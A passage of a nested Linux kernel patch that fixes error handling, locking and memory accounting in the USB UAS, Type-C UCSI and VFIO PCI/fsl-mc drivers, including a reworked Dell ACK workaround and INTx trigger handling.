++		err = uas_submit_sense_urb(cmnd, GFP_ATOMIC);
++		if (err)
++			return err;
+ 		cmdinfo->state &= ~SUBMIT_STATUS_URB;
+ 	}
+ 
+@@ -572,7 +570,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		cmdinfo->data_in_urb = uas_alloc_data_urb(devinfo, GFP_ATOMIC,
+ 							cmnd, DMA_FROM_DEVICE);
+ 		if (!cmdinfo->data_in_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_DATA_IN_URB;
+ 	}
+ 
+@@ -582,7 +580,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->data_in_urb);
+ 			uas_log_cmd_state(cmnd, "data in submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->state &= ~SUBMIT_DATA_IN_URB;
+ 		cmdinfo->state |= DATA_IN_URB_INFLIGHT;
+@@ -592,7 +590,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		cmdinfo->data_out_urb = uas_alloc_data_urb(devinfo, GFP_ATOMIC,
+ 							cmnd, DMA_TO_DEVICE);
+ 		if (!cmdinfo->data_out_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_DATA_OUT_URB;
+ 	}
+ 
+@@ -602,7 +600,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->data_out_urb);
+ 			uas_log_cmd_state(cmnd, "data out submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->state &= ~SUBMIT_DATA_OUT_URB;
+ 		cmdinfo->state |= DATA_OUT_URB_INFLIGHT;
+@@ -611,7 +609,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 	if (cmdinfo->state & ALLOC_CMD_URB) {
+ 		cmdinfo->cmd_urb = uas_alloc_cmd_urb(devinfo, GFP_ATOMIC, cmnd);
+ 		if (!cmdinfo->cmd_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_CMD_URB;
+ 	}
+ 
+@@ -621,7 +619,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->cmd_urb);
+ 			uas_log_cmd_state(cmnd, "cmd submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->cmd_urb = NULL;
+ 		cmdinfo->state &= ~SUBMIT_CMD_URB;
+@@ -698,7 +696,7 @@ static int uas_queuecommand_lck(struct scsi_cmnd *cmnd)
+ 	 * of queueing, no matter how fatal the error
+ 	 */
+ 	if (err == -ENODEV) {
+-		set_host_byte(cmnd, DID_ERROR);
++		set_host_byte(cmnd, DID_NO_CONNECT);
+ 		scsi_done(cmnd);
+ 		goto zombie;
+ 	}
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 3da404d5178d3..ce83f558fe447 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -1245,6 +1245,7 @@ static ssize_t select_usb_power_delivery_store(struct device *dev,
+ {
+ 	struct typec_port *port = to_typec_port(dev);
+ 	struct usb_power_delivery *pd;
++	int ret;
+ 
+ 	if (!port->ops || !port->ops->pd_set)
+ 		return -EOPNOTSUPP;
+@@ -1253,7 +1254,11 @@ static ssize_t select_usb_power_delivery_store(struct device *dev,
+ 	if (!pd)
+ 		return -EINVAL;
+ 
+-	return port->ops->pd_set(port, pd);
++	ret = port->ops->pd_set(port, pd);
++	if (ret)
++		return ret;
++
++	return size;
+ }
+ 
+ static ssize_t select_usb_power_delivery_show(struct device *dev,
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 0695ee54ff781..98f335cbbcdea 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -138,8 +138,12 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 	if (!(cci & UCSI_CCI_COMMAND_COMPLETE))
+ 		return -EIO;
+ 
+-	if (cci & UCSI_CCI_NOT_SUPPORTED)
++	if (cci & UCSI_CCI_NOT_SUPPORTED) {
++		if (ucsi_acknowledge_command(ucsi) < 0)
++			dev_err(ucsi->dev,
++				"ACK of unsupported command failed\n");
+ 		return -EOPNOTSUPP;
++	}
+ 
+ 	if (cci & UCSI_CCI_ERROR) {
+ 		if (cmd == UCSI_GET_ERROR_STATUS)
+@@ -829,11 +833,11 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (con->status.change & UCSI_CONSTAT_CAM_CHANGE)
+ 		ucsi_partner_task(con, ucsi_check_altmodes, 1, 0);
+ 
+-	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+-
+ 	mutex_lock(&ucsi->ppm_lock);
++	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 	ret = ucsi_acknowledge_connector_change(ucsi);
+ 	mutex_unlock(&ucsi->ppm_lock);
++
+ 	if (ret)
+ 		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+ 
+@@ -874,13 +878,47 @@ static int ucsi_reset_connector(struct ucsi_connector *con, bool hard)
+ 
+ static int ucsi_reset_ppm(struct ucsi *ucsi)
+ {
+-	u64 command = UCSI_PPM_RESET;
++	u64 command;
+ 	unsigned long tmo;
+ 	u32 cci;
+ 	int ret;
+ 
+ 	mutex_lock(&ucsi->ppm_lock);
+ 
++	ret = ucsi->ops->read(ucsi, UCSI_CCI, &cci, sizeof(cci));
++	if (ret < 0)
++		goto out;
++
++	/*
++	 * If UCSI_CCI_RESET_COMPLETE is already set, we must clear
++	 * the flag before we start another reset. Send a
++	 * UCSI_SET_NOTIFICATION_ENABLE command to achieve this.
++	 * Ignore a timeout and try the reset anyway if this fails.
++	 */
++	if (cci & UCSI_CCI_RESET_COMPLETE) {
++		command = UCSI_SET_NOTIFICATION_ENABLE;
++		ret = ucsi->ops->async_write(ucsi, UCSI_CONTROL, &command,
++					     sizeof(command));
++		if (ret < 0)
++			goto out;
++
++		tmo = jiffies + msecs_to_jiffies(UCSI_TIMEOUT_MS);
++		do {
++			ret = ucsi->ops->read(ucsi, UCSI_CCI,
++					      &cci, sizeof(cci));
++			if (ret < 0)
++				goto out;
++			if (cci & UCSI_CCI_COMMAND_COMPLETE)
++				break;
++			if (time_is_before_jiffies(tmo))
++				break;
++			msleep(20);
++		} while (1);
++
++		WARN_ON(cci & UCSI_CCI_RESET_COMPLETE);
++	}
++
++	command = UCSI_PPM_RESET;
+ 	ret = ucsi->ops->async_write(ucsi, UCSI_CONTROL, &command,
+ 				     sizeof(command));
+ 	if (ret < 0)
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index 60ce9fb6e7450..dbb10cb310d4c 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -220,12 +220,12 @@ struct ucsi_cable_property {
+ #define UCSI_CABLE_PROP_FLAG_VBUS_IN_CABLE	BIT(0)
+ #define UCSI_CABLE_PROP_FLAG_ACTIVE_CABLE	BIT(1)
+ #define UCSI_CABLE_PROP_FLAG_DIRECTIONALITY	BIT(2)
+-#define UCSI_CABLE_PROP_FLAG_PLUG_TYPE(_f_)	((_f_) & GENMASK(3, 0))
++#define UCSI_CABLE_PROP_FLAG_PLUG_TYPE(_f_)	(((_f_) & GENMASK(4, 3)) >> 3)
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_A	0
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_B	1
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_C	2
+ #define   UCSI_CABLE_PROPERTY_PLUG_OTHER	3
+-#define UCSI_CABLE_PROP_MODE_SUPPORT		BIT(5)
++#define UCSI_CABLE_PROP_FLAG_MODE_SUPPORT	BIT(5)
+ 	u8 latency;
+ } __packed;
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 48130d636a020..b4d86d47c5db4 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -23,10 +23,11 @@ struct ucsi_acpi {
+ 	void *base;
+ 	struct completion complete;
+ 	unsigned long flags;
++#define UCSI_ACPI_SUPPRESS_EVENT	0
++#define UCSI_ACPI_COMMAND_PENDING	1
++#define UCSI_ACPI_ACK_PENDING		2
+ 	guid_t guid;
+ 	u64 cmd;
+-	bool dell_quirk_probed;
+-	bool dell_quirk_active;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -79,9 +80,9 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	int ret;
+ 
+ 	if (ack)
+-		set_bit(ACK_PENDING, &ua->flags);
++		set_bit(UCSI_ACPI_ACK_PENDING, &ua->flags);
+ 	else
+-		set_bit(COMMAND_PENDING, &ua->flags);
++		set_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags);
+ 
+ 	ret = ucsi_acpi_async_write(ucsi, offset, val, val_len);
+ 	if (ret)
+@@ -92,9 +93,9 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 
+ out_clear_bit:
+ 	if (ack)
+-		clear_bit(ACK_PENDING, &ua->flags);
++		clear_bit(UCSI_ACPI_ACK_PENDING, &ua->flags);
+ 	else
+-		clear_bit(COMMAND_PENDING, &ua->flags);
++		clear_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags);
+ 
+ 	return ret;
+ }
+@@ -129,51 +130,40 @@ static const struct ucsi_operations ucsi_zenbook_ops = {
+ };
+ 
+ /*
+- * Some Dell laptops expect that an ACK command with the
+- * UCSI_ACK_CONNECTOR_CHANGE bit set is followed by a (separate)
+- * ACK command that only has the UCSI_ACK_COMMAND_COMPLETE bit set.
+- * If this is not done events are not delivered to OSPM and
+- * subsequent commands will timeout.
++ * Some Dell laptops don't like ACK commands that have the
++ * UCSI_ACK_CONNECTOR_CHANGE bit set but not the
++ * UCSI_ACK_COMMAND_COMPLETE bit. To work around this, send a dummy
++ * command and bundle the UCSI_ACK_CONNECTOR_CHANGE with the
++ * UCSI_ACK_COMMAND_COMPLETE for the dummy command.
+  */
+ static int
+ ucsi_dell_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 		     const void *val, size_t val_len)
+ {
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
+-	u64 cmd = *(u64 *)val, ack = 0;
++	u64 cmd = *(u64 *)val;
++	u64 dummycmd = UCSI_GET_CAPABILITY;
+ 	int ret;
+ 
+-	if (UCSI_COMMAND(cmd) == UCSI_ACK_CC_CI &&
+-	    cmd & UCSI_ACK_CONNECTOR_CHANGE)
+-		ack = UCSI_ACK_CC_CI | UCSI_ACK_COMMAND_COMPLETE;
+-
+-	ret = ucsi_acpi_sync_write(ucsi, offset, val, val_len);
+-	if (ret != 0)
+-		return ret;
+-	if (ack == 0)
+-		return ret;
+-
+-	if (!ua->dell_quirk_probed) {
+-		ua->dell_quirk_probed = true;
+-
+-		cmd = UCSI_GET_CAPABILITY;
+-		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd,
+-					   sizeof(cmd));
+-		if (ret == 0)
+-			return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL,
+-						    &ack, sizeof(ack));
+-		if (ret != -ETIMEDOUT)
++	if (cmd == (UCSI_ACK_CC_CI | UCSI_ACK_CONNECTOR_CHANGE)) {
++		cmd |= UCSI_ACK_COMMAND_COMPLETE;
++
++		/*
++		 * The UCSI core thinks it is sending a connector change ack
++		 * and will accept new connector change events. We don't want
++		 * this to happen for the dummy command as its response will
++		 * still report the very event that the core is trying to clear.
++		 */
++		set_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags);
++		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &dummycmd,
++					   sizeof(dummycmd));
++		clear_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags);
++
++		if (ret < 0)
+ 			return ret;
+-
+-		ua->dell_quirk_active = true;
+-		dev_err(ua->dev, "Firmware bug: Additional ACK required after ACKing a connector change.\n");
+-		dev_err(ua->dev, "Firmware bug: Enabling workaround\n");
+ 	}
+ 
+-	if (!ua->dell_quirk_active)
+-		return ret;
+-
+-	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &ack, sizeof(ack));
++	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+ }
+ 
+ static const struct ucsi_operations ucsi_dell_ops = {
+@@ -209,13 +199,14 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	if (ret)
+ 		return;
+ 
+-	if (UCSI_CCI_CONNECTOR(cci))
++	if (UCSI_CCI_CONNECTOR(cci) &&
++	    !test_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags))
+ 		ucsi_connector_change(ua->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+ 	if (cci & UCSI_CCI_ACK_COMPLETE && test_bit(ACK_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ 	if (cci & UCSI_CCI_COMMAND_COMPLETE &&
+-	    test_bit(COMMAND_PENDING, &ua->flags))
++	    test_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ }
+ 
+diff --git a/drivers/vfio/container.c b/drivers/vfio/container.c
+index d74164abbf401..ab9d8e3481f75 100644
+--- a/drivers/vfio/container.c
++++ b/drivers/vfio/container.c
+@@ -366,7 +366,7 @@ static int vfio_fops_open(struct inode *inode, struct file *filep)
+ {
+ 	struct vfio_container *container;
+ 
+-	container = kzalloc(sizeof(*container), GFP_KERNEL);
++	container = kzalloc(sizeof(*container), GFP_KERNEL_ACCOUNT);
+ 	if (!container)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c b/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
+index 7b428eac3d3e5..b125b6edf634e 100644
+--- a/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
++++ b/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
+@@ -142,13 +142,14 @@ static int vfio_fsl_mc_set_irq_trigger(struct vfio_fsl_mc_device *vdev,
+ 	irq = &vdev->mc_irqs[index];
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_fsl_mc_irq_handler(hwirq, irq);
++		if (irq->trigger)
++			eventfd_signal(irq->trigger, 1);
+ 
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		u8 trigger = *(u8 *)data;
+ 
+-		if (trigger)
+-			vfio_fsl_mc_irq_handler(hwirq, irq);
++		if (trigger && irq->trigger)
++			eventfd_signal(irq->trigger, 1);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/vfio/pci/vfio_pci_config.c b/drivers/vfio/pci/vfio_pci_config.c
+index 4a350421c5f62..523e0144c86fa 100644
+--- a/drivers/vfio/pci/vfio_pci_config.c
++++ b/drivers/vfio/pci/vfio_pci_config.c
+@@ -1244,7 +1244,7 @@ static int vfio_msi_cap_len(struct vfio_pci_core_device *vdev, u8 pos)
+ 	if (vdev->msi_perm)
+ 		return len;
+ 
+-	vdev->msi_perm = kmalloc(sizeof(struct perm_bits), GFP_KERNEL);
++	vdev->msi_perm = kmalloc(sizeof(struct perm_bits), GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->msi_perm)
+ 		return -ENOMEM;
+ 
+@@ -1731,11 +1731,11 @@ int vfio_config_init(struct vfio_pci_core_device *vdev)
+ 	 * no requirements on the length of a capability, so the gap between
+ 	 * capabilities needs byte granularity.
+ 	 */
+-	map = kmalloc(pdev->cfg_size, GFP_KERNEL);
++	map = kmalloc(pdev->cfg_size, GFP_KERNEL_ACCOUNT);
+ 	if (!map)
+ 		return -ENOMEM;
+ 
+-	vconfig = kmalloc(pdev->cfg_size, GFP_KERNEL);
++	vconfig = kmalloc(pdev->cfg_size, GFP_KERNEL_ACCOUNT);
+ 	if (!vconfig) {
+ 		kfree(map);
+ 		return -ENOMEM;
+diff --git a/drivers/vfio/pci/vfio_pci_core.c b/drivers/vfio/pci/vfio_pci_core.c
+index e030c2120183e..f357fd157e1ed 100644
+--- a/drivers/vfio/pci/vfio_pci_core.c
++++ b/drivers/vfio/pci/vfio_pci_core.c
+@@ -141,7 +141,8 @@ static void vfio_pci_probe_mmaps(struct vfio_pci_core_device *vdev)
+ 			 * of the exclusive page in case that hot-add
+ 			 * device's bar is assigned into it.
+ 			 */
+-			dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
++			dummy_res =
++				kzalloc(sizeof(*dummy_res), GFP_KERNEL_ACCOUNT);
+ 			if (dummy_res == NULL)
+ 				goto no_mmap;
+ 
+@@ -856,7 +857,7 @@ int vfio_pci_core_register_dev_region(struct vfio_pci_core_device *vdev,
+ 
+ 	region = krealloc(vdev->region,
+ 			  (vdev->num_regions + 1) * sizeof(*region),
+-			  GFP_KERNEL);
++			  GFP_KERNEL_ACCOUNT);
+ 	if (!region)
+ 		return -ENOMEM;
+ 
+@@ -1637,7 +1638,7 @@ static int __vfio_pci_add_vma(struct vfio_pci_core_device *vdev,
+ {
+ 	struct vfio_pci_mmap_vma *mmap_vma;
+ 
+-	mmap_vma = kmalloc(sizeof(*mmap_vma), GFP_KERNEL);
++	mmap_vma = kmalloc(sizeof(*mmap_vma), GFP_KERNEL_ACCOUNT);
+ 	if (!mmap_vma)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/pci/vfio_pci_igd.c b/drivers/vfio/pci/vfio_pci_igd.c
+index 5e6ca59269548..dd70e2431bd74 100644
+--- a/drivers/vfio/pci/vfio_pci_igd.c
++++ b/drivers/vfio/pci/vfio_pci_igd.c
+@@ -180,7 +180,7 @@ static int vfio_pci_igd_opregion_init(struct vfio_pci_core_device *vdev)
+ 	if (!addr || !(~addr))
+ 		return -ENODEV;
+ 
+-	opregionvbt = kzalloc(sizeof(*opregionvbt), GFP_KERNEL);
++	opregionvbt = kzalloc(sizeof(*opregionvbt), GFP_KERNEL_ACCOUNT);
+ 	if (!opregionvbt)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/pci/vfio_pci_intrs.c b/drivers/vfio/pci/vfio_pci_intrs.c
+index 40c3d7cf163f6..03246a59b5536 100644
+--- a/drivers/vfio/pci/vfio_pci_intrs.c
++++ b/drivers/vfio/pci/vfio_pci_intrs.c
+@@ -55,17 +55,24 @@ static void vfio_send_intx_eventfd(void *opaque, void *unused)
+ {
+ 	struct vfio_pci_core_device *vdev = opaque;
+ 
+-	if (likely(is_intx(vdev) && !vdev->virq_disabled))
+-		eventfd_signal(vdev->ctx[0].trigger, 1);
++	if (likely(is_intx(vdev) && !vdev->virq_disabled)) {
++		struct eventfd_ctx *trigger;
++
++		trigger = READ_ONCE(vdev->ctx[0].trigger);
++		if (likely(trigger))
++			eventfd_signal(trigger, 1);
++	}
+ }
+ 
+ /* Returns true if the INTx vfio_pci_irq_ctx.masked value is changed. */
+-bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
++static bool __vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+ 	unsigned long flags;
+ 	bool masked_changed = false;
+ 
++	lockdep_assert_held(&vdev->igate);
++
+ 	spin_lock_irqsave(&vdev->irqlock, flags);
+ 
+ 	/*
+@@ -95,6 +102,17 @@ bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
+ 	return masked_changed;
+ }
+ 
++bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
++{
++	bool mask_changed;
++
++	mutex_lock(&vdev->igate);
++	mask_changed = __vfio_pci_intx_mask(vdev);
++	mutex_unlock(&vdev->igate);
++
++	return mask_changed;
++}
++
+ /*
+  * If this is triggered by an eventfd, we can't call eventfd_signal
+  * or else we'll deadlock on the eventfd wait queue.  Return >0 when
+@@ -137,12 +155,21 @@ static int vfio_pci_intx_unmask_handler(void *opaque, void *unused)
+ 	return ret;
+ }
+ 
+-void vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
++static void __vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
+ {
++	lockdep_assert_held(&vdev->igate);
++
+ 	if (vfio_pci_intx_unmask_handler(vdev, NULL) > 0)
+ 		vfio_send_intx_eventfd(vdev, NULL);
+ }
+ 
++void vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
++{
++	mutex_lock(&vdev->igate);
++	__vfio_pci_intx_unmask(vdev);
++	mutex_unlock(&vdev->igate);
++}
++
+ static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_pci_core_device *vdev = dev_id;
+@@ -169,95 +196,104 @@ static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
+ 	return ret;
+ }
+ 
+-static int vfio_intx_enable(struct vfio_pci_core_device *vdev)
++static int vfio_intx_enable(struct vfio_pci_core_device *vdev,
++			    struct eventfd_ctx *trigger)
+ {
++	struct pci_dev *pdev = vdev->pdev;
++	unsigned long irqflags;
++	char *name;
++	int ret;
++
+ 	if (!is_irq_none(vdev))
+ 		return -EINVAL;
+ 
+-	if (!vdev->pdev->irq)
++	if (!pdev->irq)
+ 		return -ENODEV;
+ 
+-	vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
++	name = kasprintf(GFP_KERNEL_ACCOUNT, "vfio-intx(%s)", pci_name(pdev));
++	if (!name)
++		return -ENOMEM;
++
++	vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->ctx)
+ 		return -ENOMEM;
+ 
+ 	vdev->num_ctx = 1;
+ 
++	vdev->ctx[0].name = name;
++	vdev->ctx[0].trigger = trigger;
++
+ 	/*
+-	 * If the virtual interrupt is masked, restore it.  Devices
+-	 * supporting DisINTx can be masked at the hardware level
+-	 * here, non-PCI-2.3 devices will have to wait until the
+-	 * interrupt is enabled.
++	 * Fill the initial masked state based on virq_disabled.  After
++	 * enable, changing the DisINTx bit in vconfig directly changes INTx
++	 * masking.  igate prevents races during setup; once running, masked
++	 * is protected via irqlock.
++	 *
++	 * Devices supporting DisINTx also reflect the current mask state in
++	 * the physical DisINTx bit, which is not affected during IRQ setup.
++	 *
++	 * Devices without DisINTx support require an exclusive interrupt.
++	 * IRQ masking is performed at the IRQ chip.  Again, igate protects
++	 * against races during setup; IRQ handlers and irqfds are not
++	 * yet active, therefore masked is stable and can be used to
++	 * conditionally auto-enable the IRQ.
++	 *
++	 * irq_type must be stable while the IRQ handler is registered,
++	 * therefore it must be set before request_irq().
+ 	 */
+ 	vdev->ctx[0].masked = vdev->virq_disabled;
+-	if (vdev->pci_2_3)
+-		pci_intx(vdev->pdev, !vdev->ctx[0].masked);
++	if (vdev->pci_2_3) {
++		pci_intx(pdev, !vdev->ctx[0].masked);
++		irqflags = IRQF_SHARED;
++	} else {
++		irqflags = vdev->ctx[0].masked ? IRQF_NO_AUTOEN : 0;
++	}
+ 
+ 	vdev->irq_type = VFIO_PCI_INTX_IRQ_INDEX;
+ 
++	ret = request_irq(pdev->irq, vfio_intx_handler,
++			  irqflags, vdev->ctx[0].name, vdev);
++	if (ret) {
++		vdev->irq_type = VFIO_PCI_NUM_IRQS;
++		kfree(name);
++		vdev->num_ctx = 0;
++		kfree(vdev->ctx);
++		return ret;
++	}
++
+ 	return 0;
+ }
+ 
+-static int vfio_intx_set_signal(struct vfio_pci_core_device *vdev, int fd)
++static int vfio_intx_set_signal(struct vfio_pci_core_device *vdev,
++				struct eventfd_ctx *trigger)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+-	unsigned long irqflags = IRQF_SHARED;
+-	struct eventfd_ctx *trigger;
+-	unsigned long flags;
+-	int ret;
++	struct eventfd_ctx *old;
+ 
+-	if (vdev->ctx[0].trigger) {
+-		free_irq(pdev->irq, vdev);
+-		kfree(vdev->ctx[0].name);
+-		eventfd_ctx_put(vdev->ctx[0].trigger);
+-		vdev->ctx[0].trigger = NULL;
+-	}
+-
+-	if (fd < 0) /* Disable only */
+-		return 0;
+-
+-	vdev->ctx[0].name = kasprintf(GFP_KERNEL, "vfio-intx(%s)",
+-				      pci_name(pdev));
+-	if (!vdev->ctx[0].name)
+-		return -ENOMEM;
++	old = vdev->ctx[0].trigger;
+ 
+-	trigger = eventfd_ctx_fdget(fd);
+-	if (IS_ERR(trigger)) {
+-		kfree(vdev->ctx[0].name);
+-		return PTR_ERR(trigger);
+-	}
++	WRITE_ONCE(vdev->ctx[0].trigger, trigger);
+ 
+-	vdev->ctx[0].trigger = trigger;
+-
+-	if (!vdev->pci_2_3)
+-		irqflags = 0;
+-
+-	ret = request_irq(pdev->irq, vfio_intx_handler,
+-			  irqflags, vdev->ctx[0].name, vdev);
+-	if (ret) {
+-		vdev->ctx[0].trigger = NULL;
+-		kfree(vdev->ctx[0].name);
+-		eventfd_ctx_put(trigger);
+-		return ret;
++	/* Releasing an old ctx requires synchronizing in-flight users */
++	if (old) {
++		synchronize_irq(pdev->irq);
++		vfio_virqfd_flush_thread(&vdev->ctx[0].unmask);
++		eventfd_ctx_put(old);
+ 	}
+ 
+-	/*
+-	 * INTx disable will stick across the new irq setup,
+-	 * disable_irq won't.
+-	 */
+-	spin_lock_irqsave(&vdev->irqlock, flags);
+-	if (!vdev->pci_2_3 && vdev->ctx[0].masked)
+-		disable_irq_nosync(pdev->irq);
+-	spin_unlock_irqrestore(&vdev->irqlock, flags);
+-
+ 	return 0;
+ }
+ 
+ static void vfio_intx_disable(struct vfio_pci_core_device *vdev)
+ {
++	struct pci_dev *pdev = vdev->pdev;
++
+ 	vfio_virqfd_disable(&vdev->ctx[0].unmask);
+ 	vfio_virqfd_disable(&vdev->ctx[0].mask);
+-	vfio_intx_set_signal(vdev, -1);
++	free_irq(pdev->irq, vdev);
++	if (vdev->ctx[0].trigger)
++		eventfd_ctx_put(vdev->ctx[0].trigger);
++	kfree(vdev->ctx[0].name);
+ 	vdev->irq_type = VFIO_PCI_NUM_IRQS;
+ 	vdev->num_ctx = 0;
+ 	kfree(vdev->ctx);
+@@ -284,7 +320,8 @@ static int vfio_msi_enable(struct vfio_pci_core_device *vdev, int nvec, bool msi
+ 	if (!is_irq_none(vdev))
+ 		return -EINVAL;
+ 
+-	vdev->ctx = kcalloc(nvec, sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
++	vdev->ctx = kcalloc(nvec, sizeof(struct vfio_pci_irq_ctx),
++			    GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->ctx)
+ 		return -ENOMEM;
+ 
+@@ -316,14 +353,14 @@ static int vfio_msi_enable(struct vfio_pci_core_device *vdev, int nvec, bool msi
+ }
+ 
+ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+-				      int vector, int fd, bool msix)
++				      unsigned int vector, int fd, bool msix)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+ 	struct eventfd_ctx *trigger;
+ 	int irq, ret;
+ 	u16 cmd;
+ 
+-	if (vector < 0 || vector >= vdev->num_ctx)
++	if (vector >= vdev->num_ctx)
+ 		return -EINVAL;
+ 
+ 	irq = pci_irq_vector(pdev, vector);
+@@ -343,7 +380,8 @@ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+ 	if (fd < 0)
+ 		return 0;
+ 
+-	vdev->ctx[vector].name = kasprintf(GFP_KERNEL, "vfio-msi%s[%d](%s)",
++	vdev->ctx[vector].name = kasprintf(GFP_KERNEL_ACCOUNT,
++					   "vfio-msi%s[%d](%s)",
+ 					   msix ? "x" : "", vector,
+ 					   pci_name(pdev));
+ 	if (!vdev->ctx[vector].name)
+@@ -397,7 +435,8 @@ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ 			      unsigned count, int32_t *fds, bool msix)
+ {
+-	int i, j, ret = 0;
++	unsigned int i, j;
++	int ret = 0;
+ 
+ 	if (start >= vdev->num_ctx || start + count > vdev->num_ctx)
+ 		return -EINVAL;
+@@ -408,8 +447,8 @@ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ 	}
+ 
+ 	if (ret) {
+-		for (--j; j >= (int)start; j--)
+-			vfio_msi_set_vector_signal(vdev, j, -1, msix);
++		for (i = start; i < j; i++)
++			vfio_msi_set_vector_signal(vdev, i, -1, msix);
+ 	}
+ 
+ 	return ret;
+@@ -418,16 +457,15 @@ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ static void vfio_msi_disable(struct vfio_pci_core_device *vdev, bool msix)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+-	int i;
++	unsigned int i;
+ 	u16 cmd;
+ 
+ 	for (i = 0; i < vdev->num_ctx; i++) {
+ 		vfio_virqfd_disable(&vdev->ctx[i].unmask);
+ 		vfio_virqfd_disable(&vdev->ctx[i].mask);
